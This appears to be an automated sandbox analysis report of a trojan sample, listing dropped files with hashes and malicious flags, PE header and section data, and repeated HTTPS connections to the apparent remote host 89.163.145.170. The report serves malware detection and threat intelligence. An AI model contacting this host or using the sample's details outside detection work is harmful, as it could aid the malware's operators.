SHA-256: | F549ACD3831B9D3992C42C0D5A8DCDBA793019C4399AFEB851ECF10C4A79C399 |
SHA-512: | 54EA5B47163DED8983229E97AB985EE31B5E4553BC985D895096A513D180351696463F91B7ACE81F75CE5E317FF74435C0AC11FE0D8887E4457B9C615B4BF116 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4834 |
Entropy (8bit): | 4.46573552928604 |
Encrypted: | false |
SSDEEP: | 48:cvIwWl8zssJg771I91KWpW8VYxYm8M4JM/Ftyq8vyvZew0Md:uIjfqI76r7V9JmWaZeFMd |
MD5: | 80BB6A3A6C07FC1649731C1D4E8CB897 |
SHA1: | 3C2B3BD5B5B81F202CF5083F401E228B95A49327 |
SHA-256: | 28765EC0C90183297CF2DBC86DFB83461E0A448C46D58C3742579A670D5626F1 |
SHA-512: | AFB086081095555B380D6DCAE1D50DF1967AA3C8B5CAC4F06FEBC88B31BECF783C3CDA7336E9BF04C2809A723E581498AF2AA50CD160D06BC7CF655C6D5E4231 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe.log
Process: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 654 |
Entropy (8bit): | 5.380476433908377 |
Encrypted: | false |
SSDEEP: | 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT |
MD5: | 30E4BDFC34907D0E4D11152CAEBE27FA |
SHA1: | 825402D6B151041BA01C5117387228EC9B7168BF |
SHA-256: | A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63 |
SHA-512: | 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 80384 |
Entropy (8bit): | 0.7660406673087843 |
Encrypted: | false |
SSDEEP: | 192:BTeTVUkbERHs1pWA4avskoY6g1KbbCcDD:wVUkyHs1pig6g17cX |
MD5: | 75C85B7E8AB404F086BC180768B67081 |
SHA1: | 8D1E90B4C05C0F056AF593736B0305C5D7CF518B |
SHA-256: | 553BC97BCBE4671D4B76082B03B65AD6B9517B3AAF83D850400D64258CE68BBB |
SHA-512: | 1218AB14ED88ADE7DCA8E7C98E41D84240523678FFA8276DFFA96D2A5332711CE35C59A3E3226717A532BF9C34CA23D3782C86962138478A768DE714F1E913FB |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 995840 |
Entropy (8bit): | 5.630174987352983 |
Encrypted: | false |
SSDEEP: | 24576:DIbp4sZotkNjFC/4qxp+k+kPFoHZvPrSMc:cvotkNjg/lhqZvG |
MD5: | 90FD25CED85FE6DB28D21AE7D1F02E2C |
SHA1: | E27EFF4CD4D383F5C564CCE2BD1AAA2FFE4EC056 |
SHA-256: | 97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F |
SHA-512: | 1C775CF8DFDE037EAA98EB14088C70D74923F0F6A83030A71F2F4C1A4453F6154DAB7A4AA175E429860BADDA3E5E0AE226F3C3E8171332F5962BF36F8AA073FA |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 827 |
Entropy (8bit): | 5.298344908566429 |
Encrypted: | false |
SSDEEP: | 24:hMNmMvy4GqptE0ia5WNp8xuY8y+shEr88+M8E4olEC:ImMqopO0Jqd4+sGXt40F |
MD5: | 702C5998DD6D976C132C044F3A1AC842 |
SHA1: | C96E3B78885214A5652C4D44233BACEED1D93AF3 |
SHA-256: | 5F7FFB6600B1AA604090C18B79367DDE254847E01DBE0A8027BA83F8216B51DF |
SHA-512: | 23F3E80C4847CEEF98ABA552B82964A847582D095FED4C8F7069CCE747EC09327D3D7A69403A826972A7C51431947B312A0457201379110F2BFC2008B9D90E2B |
Malicious: | true |
Preview: |
Process: | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 103 |
Entropy (8bit): | 3.9770111444684244 |
Encrypted: | false |
SSDEEP: | 3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm |
MD5: | 487AB53955A5EA101720115F32237A45 |
SHA1: | C59D22F8BC8005694505ADDEF88F7968C8D393D3 |
SHA-256: | D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368 |
SHA-512: | 468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.465729750120641 |
Encrypted: | false |
SSDEEP: | 6144:xIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNRdwBCswSby:SXD94VWlLZMM6YFHD+y |
MD5: | 124A5E4456F5085D7D2062C1EE5091EE |
SHA1: | 0297D159BED514EFF13175232124F2F0E215D229 |
SHA-256: | 5422A2D0AB0AC9643F89FB7B792747255C1BDE2F2FDE1C049486A5CD107EF55D |
SHA-512: | C84AFCA39020E7CA17719E1864DAEBA2370FE8DFA659A568AC00E29514DDD0387797103110A2D224F01631393FE9F078B2908941D792AA1995EE338F66788D11 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 571 |
Entropy (8bit): | 4.9398118662542965 |
Encrypted: | false |
SSDEEP: | 12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe |
MD5: | 5294778E41EE83E1F1E78B56466AD690 |
SHA1: | 348B8B4687216D57B8DF59BBCEC481DC9D1E61A6 |
SHA-256: | 3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C |
SHA-512: | 381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1 |
Malicious: | true |
Yara Hits: |
|
Preview: |
File type: | |
Entropy (8bit): | 7.9964618702622134 |
TrID: |
|
File name: | SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File size: | 1'010'176 bytes |
MD5: | 7afabb528ce69e3a40dec6c3253ef854 |
SHA1: | 5161cc329e2fdda24218898bf637bb47a29daea2 |
SHA256: | 130b8c87664cf95a9fee611a0c14098a4da51f6b768260ad40a7d28ff895aaf0 |
SHA512: | 7eae4d625dfa0313eb3e4c73e5306d0d49d84bc30cfd6d5be41797d315926d7427ac2733206e6263e72c687193ad21737e649cba0fe79bad1798d93c1f18fe5f |
SSDEEP: | 24576:W70v2bR+kpZKDxCUGhJqBAJzJi6adwBih5u5eQp0U:Z2bR+k+VK42z0XwIKp0U |
TLSH: | 29252310028802C3D57A7EB730AE776EC69BD119B9EF0D97F3A917B3063557B8A016D2 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F!.f.................`..........~~... ........@.. ....................................@................................ |
Icon Hash: | 90cececece8e8eb0 |
Entrypoint: | 0x4f7e7e |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x66E72146 [Sun Sep 15 18:02:46 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Instruction |
---|
jmp dword ptr [00402000h] |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf7e2c | 0x4f | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x4ce | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0xf5e84 | 0xf6000 | fc12603564eda3f35e416db8fa213c5e | False | 0.9380250015879065 | data | 7.998024903988678 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0xf8000 | 0x4ce | 0x600 | d1bb5ddcae2985391dfb14e9099788c0 | False | 0.3743489583333333 | data | 3.7194301486493373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xfa000 | 0xc | 0x200 | a8c352392b962b89a6d310ddf9f9e069 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_VERSION | 0xf80a0 | 0x244 | data | 0.4706896551724138 | ||
RT_MANIFEST | 0xf82e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | 0.5469387755102041 |
DLL | Import |
---|---|
mscoree.dll | _CorExeMain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 16, 2024 12:22:49.615511894 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:49.615864992 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:49.615878105 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.235726118 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.236469030 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.236480951 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.237199068 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.237204075 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.494885921 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.494976997 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.495039940 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.495455980 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.495471954 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.495481968 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.495487928 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:52.642353058 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:52.642402887 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:52.642499924 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:52.642839909 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:52.642859936 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.264830112 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.265551090 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.265571117 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.266444921 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.266453028 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.522586107 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.522660971 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.522803068 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.523164034 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.523164034 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.523194075 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.523207903 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:54.729829073 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:54.729871035 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:54.729942083 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:54.730534077 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:54.730549097 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.351984024 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.352907896 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.352922916 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.353666067 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.353672981 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609446049 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609515905 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609595060 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.609930992 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.609945059 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609963894 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.609968901 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:56.735512972 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:56.735558987 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:56.735640049 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:56.735784054 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:56.735793114 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.367954969 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.368434906 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.368447065 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.369184017 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.369189978 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.628643990 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.628705978 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.628774881 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.629472017 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.629492998 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.629530907 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.629538059 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:58.820679903 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:58.820739031 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:58.820821047 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:58.820966959 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:58.820995092 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.555695057 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.556431055 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.556451082 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.557182074 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.557193995 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.817446947 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.817507982 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.817574024 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.817989111 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.818015099 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.818038940 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.818053961 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.033159018 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.033198118 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.033288956 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.033490896 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.033503056 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.651741982 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.652282000 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.652309895 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.653146982 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.653156042 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908324957 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908385992 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908607006 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.908909082 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.908932924 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908947945 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.908956051 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:06.423160076 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:06.423207998 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:06.423326015 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:06.423470020 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:06.423487902 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.052336931 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.052758932 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.052772999 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.053405046 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.053411007 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.312895060 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.312958002 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.313056946 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.313744068 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.313760996 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.313807964 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.313815117 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:10.454354048 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:10.454452038 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:10.454622984 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:10.454772949 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:10.454806089 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.178112984 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.178807974 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.178886890 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.179599047 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.179614067 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.437993050 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.438066959 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.438148022 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.438632965 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.438672066 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.438688993 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.438704014 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:13.493233919 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:13.493283987 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:13.493376017 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:13.493526936 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:13.493542910 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.116096020 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.117897987 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.117933035 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.119107008 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.119113922 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374258995 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374321938 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374375105 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.374835014 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.374855995 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374869108 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.374874115 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:16.539326906 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:16.539438009 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:16.539525986 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:16.539701939 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:16.539737940 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.182655096 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.184565067 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.184628963 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.191162109 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.191175938 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.444603920 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.444678068 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.444755077 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.445174932 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.445203066 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.445213079 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.445220947 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:19.556683064 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
